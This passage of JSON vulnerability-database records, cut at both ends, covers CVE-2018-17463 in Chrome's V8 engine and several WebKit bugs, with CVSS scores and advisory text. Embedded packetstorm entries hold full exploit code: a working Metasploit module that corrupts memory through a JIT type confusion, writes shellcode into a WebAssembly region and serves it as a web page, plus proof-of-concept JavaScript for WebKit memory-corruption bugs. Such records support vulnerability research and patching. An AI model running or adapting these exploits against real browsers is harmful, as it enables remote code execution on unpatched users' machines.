been made broadly available, the bug report will become\r\nvisible to the public.\n\n# 0day.today [2018-01-26] #", "sourceHref": "https://0day.today/exploit/28183", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "attackerkb": [{"lastseen": "2022-06-08T19:56:40", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-11-14T00:00:00", "type": "attackerkb", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-07-30T00:00:00", "id": "AKB:1FEA5875-DB2E-48AA-A4F4-0E24C3124828", "href": "https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Google Chromium V8 Engine contains an unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2022-06-08T00:00:00", "id": "CISA-KEV-CVE-2018-17463", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-03-06T22:52:32", "description": "", "cvss3": {}, "published": "2020-03-05T00:00:00", "type": "packetstorm", "title": "Google Chrome 67 / 68 / 69 Object.create Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-17463"], "modified": "2020-03-05T00:00:00", "id": "PACKETSTORM:156640", "href": "https://packetstormsecurity.com/files/156640/Google-Chrome-67-68-69-Object.create-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit', \n'Description' => %q{ \nThis modules exploits a type confusion in Google Chromes JIT compiler. \nThe Object.create operation can be used to cause a type confusion between a \nPropertyArray and a NameDictionary. \nThe payload is executed within the rwx region of the sandboxed renderer \nprocess, so the browser must be run with the --no-sandbox option for the \npayload to work. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'saelo', # discovery and exploit \n'timwr', # metasploit module \n], \n'References' => [ \n['CVE', '2018-17463'], \n['URL', 'http://www.phrack.org/papers/jit_exploitation.html'], \n['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'], \n['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'], \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => ['windows', 'osx'], \n'DefaultTarget' => 0, \n'Targets' => [ [ 'Automatic', { } ] ], \n'DisclosureDate' => 'Sep 25 2018')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]), \n]) \nend \n \ndef on_request_uri(cli, request) \n \nif datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*} \nprint_status(\"[*] \" + request.body) \nsend_response(cli, '') \nreturn \nend \n \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \n \njscript = %Q^ \nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]); \n \nlet ab = new ArrayBuffer(8); \nlet floatView = new Float64Array(ab); \nlet uint64View = new BigUint64Array(ab); \nlet uint8View = new Uint8Array(ab); \n \nNumber.prototype.toBigInt = function toBigInt() { \nfloatView[0] = this; \nreturn uint64View[0]; \n}; \n \nBigInt.prototype.toNumber = function toNumber() { \nuint64View[0] = this; \nreturn floatView[0]; \n}; \n \nfunction hex(n) { \nreturn '0x' + n.toString(16); \n}; \n \nfunction fail(s) { \nprint('FAIL ' + s); \nthrow null; \n} \n \nconst NUM_PROPERTIES = 32; \nconst MAX_ITERATIONS = 100000; \n \nfunction gc() { \nfor (let i = 0; i < 200; i++) { \nnew ArrayBuffer(0x100000); \n} \n} \n \nfunction make(properties) { \nlet o = {inline: 42} // TODO \nfor (let i = 0; i < NUM_PROPERTIES; i++) { \neval(`o.p${i} = properties[${i}];`); \n} \nreturn o; \n} \n \nfunction pwn() { \nfunction find_overlapping_properties() { \nlet propertyNames = []; \nfor (let i = 0; i < NUM_PROPERTIES; i++) { \npropertyNames[i] = `p${i}`; \n} \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \n${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')} \nreturn [${propertyNames.join(', ')}]; \n} \n`); \n \nlet propertyValues = []; \nfor (let i = 1; i < NUM_PROPERTIES; i++) { \npropertyValues[i] = -i; \n} \n \nfor (let i = 0; i < MAX_ITERATIONS; i++) { \nlet r = vuln(make(propertyValues)); \nif (r[1] !== -1) { \nfor (let i = 1; i < r.length; i++) { \nif (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) { \nreturn [i, -r[i]]; \n} \n} \n} \n} \n \nfail(\"Failed to find overlapping properties\"); \n} \n \nfunction addrof(obj) { \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \nreturn o.p${p1}.x1; \n} \n`); \n \nlet propertyValues = []; \npropertyValues[p1] = {x1: 13.37, x2: 13.38}; \npropertyValues[p2] = {y1: obj}; \n \nlet i = 0; \nfor (; i < MAX_ITERATIONS; i++) { \nlet res = vuln(make(propertyValues)); \nif (res !== 13.37) \nreturn res.toBigInt() \n} \n \nfail(\"Addrof failed\"); \n} \n \nfunction corrupt_arraybuffer(victim, newValue) { \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \nlet orig = o.p${p1}.x2; \no.p${p1}.x2 = ${newValue.toNumber()}; \nreturn orig; \n} \n`); \n \nlet propertyValues = []; \nlet o = {x1: 13.37, x2: 13.38}; \npropertyValues[p1] = o; \npropertyValues[p2] = victim; \n \nfor (let i = 0; i < MAX_ITERATIONS; i++) { \no.x2 = 13.38; \nlet r = vuln(make(propertyValues)); \nif (r !== 13.38) \nreturn r.toBigInt(); \n} \n \nfail(\"Corrupt ArrayBuffer failed\"); \n} \n \nlet [p1, p2] = find_overlapping_properties(); \nprint(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`); \n \nlet memview_buf = new ArrayBuffer(1024); \nlet driver_buf = new ArrayBuffer(1024); \n \ngc(); \n \nlet memview_buf_addr = addrof(memview_buf); \nmemview_buf_addr--; \nprint(`ArrayBuffer @ ${hex(memview_buf_addr)}`); \n \nlet original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr); \n \nlet driver = new BigUint64Array(driver_buf); \nlet original_memview_buf_ptr = driver[4]; \n \nlet memory = { \nwrite(addr, bytes) { \ndriver[4] = addr; \nlet memview = new Uint8Array(memview_buf); \nmemview.set(bytes); \n}, \nread(addr, len) { \ndriver[4] = addr; \nlet memview = new Uint8Array(memview_buf); \nreturn memview.subarray(0, len); \n}, \nreadPtr(addr) { \ndriver[4] = addr; \nlet memview = new BigUint64Array(memview_buf); \nreturn memview[0]; \n}, \nwritePtr(addr, ptr) { \ndriver[4] = addr; \nlet memview = new BigUint64Array(memview_buf); \nmemview[0] = ptr; \n}, \naddrof(obj) { \nmemview_buf.leakMe = obj; \nlet props = this.readPtr(memview_buf_addr + 8n); \nreturn this.readPtr(props + 15n) - 1n; \n}, \n}; \n \n// Generate a RWX region for the payload \nfunction get_wasm_instance() { \nvar buffer = new Uint8Array([ \n0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0, \n1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128, \n128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104, \n101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11 \n]); \nreturn new WebAssembly.Instance(new WebAssembly.Module(buffer),{}); \n} \n \nlet wasm_instance = get_wasm_instance(); \nlet wasm_addr = memory.addrof(wasm_instance); \nprint(\"wasm_addr @ \" + hex(wasm_addr)); \nlet wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n); \nprint(\"wasm_rwx @ \" + hex(wasm_rwx_addr)); \n \nmemory.write(wasm_rwx_addr, shellcode); \n \nlet fake_vtab = new ArrayBuffer(0x80); \nlet fake_vtab_u64 = new BigUint64Array(fake_vtab); \nlet fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n); \n \nlet div = document.createElement('div'); \nlet div_addr = memory.addrof(div); \nprint('div_addr @ ' + hex(div_addr)); \nlet el_addr = memory.readPtr(div_addr + 0x20n); \nprint('el_addr @ ' + hex(div_addr)); \n \nfake_vtab_u64.fill(wasm_rwx_addr, 6, 10); \nmemory.writePtr(el_addr, fake_vtab_addr); \n \nprint('Triggering...'); \n \n// Trigger virtual call \ndiv.dispatchEvent(new Event('click')); \n \n// We are done here, repair the corrupted array buffers \nlet addr = memory.addrof(driver_buf); \nmemory.writePtr(addr + 32n, original_driver_buf_ptr); \nmemory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr); \n} \n \npwn(); \n^ \n \nif datastore['DEBUG_EXPLOIT'] \ndebugjs = %Q^ \nprint = function(arg) { \nvar request = new XMLHttpRequest(); \nrequest.open(\"POST\", \"/print\", false); \nrequest.send(\"\" + arg); \n}; \n^ \njscript = \"#{debugjs}#{jscript}\" \nelse \njscript.gsub!(/\\/\\/.*$/, '') # strip comments \njscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*); \nend \n \nhtml = %Q^ \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \n^ \n \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156640/chrome_object_create.rb.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-12-12T10:40:37", "description": "", "cvss3": {}, "published": "2018-12-12T00:00:00", "type": "packetstorm", "title": "WebKit JIT Proxy Object Issue", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-4438"], "modified": "2018-12-12T00:00:00", "id": "PACKETSTORM:150746", "href": "https://packetstormsecurity.com/files/150746/WebKit-JIT-Proxy-Object-Issue.html", "sourceData": "`WebKit: JIT: Int32/Double arrays can have Proxy objects in the prototype chains \n \nCVE-2018-4438 \n \n \nBug: \nvoid JSObject::setPrototypeDirect(VM& vm, JSValue prototype) \n{ \nASSERT(prototype); \nif (prototype.isObject()) \nprototype.asCell()->didBecomePrototype(); \n \nif (structure(vm)->hasMonoProto()) { \nDeferredStructureTransitionWatchpointFire deferred(vm, structure(vm)); \nStructure* newStructure = Structure::changePrototypeTransition(vm, structure(vm), prototype, deferred); \nsetStructure(vm, newStructure); \n} else \nputDirect(vm, knownPolyProtoOffset, prototype); \n \nif (!anyObjectInChainMayInterceptIndexedAccesses(vm)) \nreturn; \n \nif (mayBePrototype()) { \nstructure(vm)->globalObject()->haveABadTime(vm); \nreturn; \n} \n \nif (!hasIndexedProperties(indexingType())) \nreturn; \n \nif (shouldUseSlowPut(indexingType())) \nreturn; \n \nswitchToSlowPutArrayStorage(vm); \n} \n \nJavaScriptCore doesn't allow native arrays to have Proxy objects as prototypes. If we try to set the prototype of an array to a Proxy object, it will end up calling either switchToSlowPutArrayStorage or haveABadTime in the above method. switchToSlowPutArrayStorage will transition the array to a SlowPutArrayStorage array. And haveABadTime will call switchToSlowPutArrayStorage on every object in the VM on a first call. Since subsequent calls to haveABadTime won't have any effect, with two global objects we can create an array having a Proxy object in the prototype chain. \n \nExploit: \ncase HasIndexedProperty: { \nArrayMode mode = node->arrayMode(); \n \nswitch (mode.type()) { \ncase Array::Int32: \ncase Array::Double: \ncase Array::Contiguous: \ncase Array::ArrayStorage: { \nbreak; \n} \ndefault: { \nclobberWorld(); \nbreak; \n} \n} \nsetNonCellTypeForNode(node, SpecBoolean); \nbreak; \n} \n \nFrom: <a href=\"https://github.com/WebKit/webkit/blob/9ca43a5d4bd8ff63ee7293cac8748d564bd7fbbd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L3481\" title=\"\" class=\"\" rel=\"nofollow\">https://github.com/WebKit/webkit/blob/9ca43a5d4bd8ff63ee7293cac8748d564bd7fbbd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L3481</a> \n \nThe above routine is based on the assumption that if the input array is a native array, it can't intercept indexed accesses therefore it will have no side effects. But actually we can create such arrays which break that assumption making it exploitable to lead to type confusion. \n \nPoC: \n<body> \n<script> \n \nfunction opt(arr, arr2) { \narr[1] = 1.1; \n \nlet tmp = 0 in arr2; \n \narr[0] = 2.3023e-320; \n \nreturn tmp; \n} \n \nfunction main() { \nlet o = document.body.appendChild(document.createElement('iframe')).contentWindow; \n \n// haveABadTime \no.eval(` \nlet p = new Proxy({}, {}); \nlet a = {__proto__: {}}; \na.__proto__.__proto__ = p; \n`); \n \nlet arr = [1.1, 2.2]; \nlet arr2 = [1.1, 2.2]; \n \nlet proto = new o.Object(); \nlet handler = {}; \n \narr2.__proto__ = proto; \nproto.__proto__ = new Proxy({}, { \nhas() { \narr[0] = {}; \n \nreturn true; \n} \n}); \n \nfor (let i = 0; i < 10000; i++) { \nopt(arr, arr2); \n} \n \nsetTimeout(() => { \ndelete arr2[0]; \n \nopt(arr, arr2); \n \nalert(arr[0]); \n}, 500); \n} \n \nmain(); \n \n</script> \n</body> \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available (whichever is earlier), the bug \nreport will become visible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/150746/GS20181212044220.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-07-26T22:47:05", "description": "", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143479", "href": "https://packetstormsecurity.com/files/143479/WebKit-JSC-JSArray-appendMemcpy-Uninitialized-Memory-Copy.html", "sourceData": "` WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \n \nCVE-2017-7064 \n \n \nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \n \nHere's a snippet of JSArray::appendMemcpy. \n \nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray) \n{ \nauto scope = DECLARE_THROW_SCOPE(vm); \n \nif (!canFastCopy(vm, otherArray)) \nreturn false; \n \nIndexingType type = indexingType(); \nIndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType()); \nif (type == ArrayWithUndecided && copyType != NonArray) { \nif (copyType == ArrayWithInt32) \nconvertUndecidedToInt32(vm); \nelse if (copyType == ArrayWithDouble) \nconvertUndecidedToDouble(vm); \nelse if (copyType == ArrayWithContiguous) \nconvertUndecidedToContiguous(vm); \nelse { \nASSERT(copyType == ArrayWithUndecided); \nreturn true; \n} \n} else if (type != copyType) \nreturn false; \n \n... \n \nif (type == ArrayWithDouble) \nmemcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength); \nelse \nmemcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength); \n \nreturn true; \n} \n \nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data. \nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type. \n \nPoC: \nfunction optNewArrayAndConcat() { \nlet a = [,,,,,,,,,]; \nreturn Array.prototype.concat.apply(a); \n} \n \nfunction main() { \nArray.prototype.constructor = { \n[Symbol.species]: function () { \nreturn [{}]; \n} \n}; \n \ngc(); \n \nfor (let i = 0; i < 0x10000; i++) { \noptNewArrayAndConcat().fill({}); \n} \n \ngc(); \n \nfor (let i = 0; i < 0x20000; i++) { \nlet res = optNewArrayAndConcat(); \nif (res[0]) \nprint(res.toString()); \n} \n} \n \nmain(); \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/143479/GS20170725014549.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-05-26T05:54:17", "description": "", "cvss3": {}, "published": "2017-05-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC BindingNode::bindValue Failed Reference Count Increase", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-25T00:00:00", "id": "PACKETSTORM:142664", "href": "https://packetstormsecurity.com/files/142664/WebKit-JSC-BindingNode-bindValue-Failed-Reference-Count-Increase.html", "sourceData": "` WebKit: JSC: BindingNode::bindValue doesn't increase the scope's reference count \n \nCVE-2017-2505 \n \n \nHere's a snippet of BindingNode::bindValue. \n \nvoid BindingNode::bindValue(BytecodeGenerator& generator, RegisterID* value) const \n{ \n... \nRegisterID* scope = generator.emitResolveScope(nullptr, var); \ngenerator.emitExpressionInfo(divotEnd(), divotStart(), divotEnd()); \nif (m_bindingContext == AssignmentContext::AssignmentExpression) \ngenerator.emitTDZCheckIfNecessary(var, nullptr, scope); \nif (isReadOnly) { \ngenerator.emitReadOnlyExceptionIfNeeded(var); \nreturn; \n} \ngenerator.emitPutToScope(scope, var, value, generator.isStrictMode() ? ThrowIfNotFound : DoNotThrowIfNotFound, initializationModeForAssignmentContext(m_bindingContext)); \ngenerator.emitProfileType(value, var, divotStart(), divotEnd()); \nif (m_bindingContext == AssignmentContext::DeclarationStatement || m_bindingContext == AssignmentContext::ConstDeclarationStatement) \ngenerator.liftTDZCheckIfPossible(var); \n... \n} \n \nThat method uses |scope| without increasing its reference count. Thus, in |emitTDZCheckIfNecessary|, same |RegisterID| might be used. \n \nGenerated opcode of the PoC: \n[ 124] resolve_scope loc13, loc3, a(@id4), <ClosureVar>, 0, 0x62d00011f1a0 \n[ 131] get_from_scope loc13, loc13, a(@id4), 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, 0 predicting None \n[ 139] op_check_tdz loc13 \n[ 141] put_to_scope loc13, a(@id4), loc12, 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, <structure>, 0 \n \nAt 131, loc13 which points the scope is overwritten with |a|. \nAt 141, |a| is used as a scope, and it causes OOB write. \n \nPoC: \n(function () { \nlet a = { \nget val() { \n[...{a = 1.45}] = []; \na.val.x; \n}, \n}; \n \na.val; \n})(); \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/142664/GS20170526052003.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T14:37:38", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-11-14T15:29:00", "type": "cve", "title": "CVE-2018-17463", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:redhat:linux_server:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:redhat:linux_workstation:6.0", "cpe:/o:redhat:linux_desktop:6.0"], "id": "CVE-2018-17463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_server:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T17:36:28", "description": "A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T18:29:00", "type": "cve", "title": "CVE-2018-4438", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2019-04-05T15:48:00", "cpe": [], "id": "CVE-2018-4438", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4438", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-24T00:44:02", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T18:15:00", "type": "cve", "title": "CVE-2019-8518", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2019-8518", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T17:27:34", "description": "An issue was discovered in certain Apple products. iOS before 11.3 is affected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is affected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2018-4122", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "CVE-2018-4122", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4122", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T18:31:09", 